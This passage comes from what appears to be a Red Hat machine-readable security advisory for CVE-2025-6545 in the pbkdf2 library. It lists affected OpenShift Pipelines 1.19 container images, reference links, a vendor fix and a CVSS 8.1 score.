"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6545"
},
{
"category": "external",
"summary": "RHBZ#2374370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374370"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6545",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6545"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/9699045c37a07f8319cfb8d44e2ff4252d7a7078",
"url": "https://github.com/browserify/pbkdf2/commit/9699045c37a07f8319cfb8d44e2ff4252d7a7078"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb",
"url": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-h7cp-r72f-jxh6",
"url": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-h7cp-r72f-jxh6"
}
],
"release_date": "2025-06-23T18:41:18.771000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
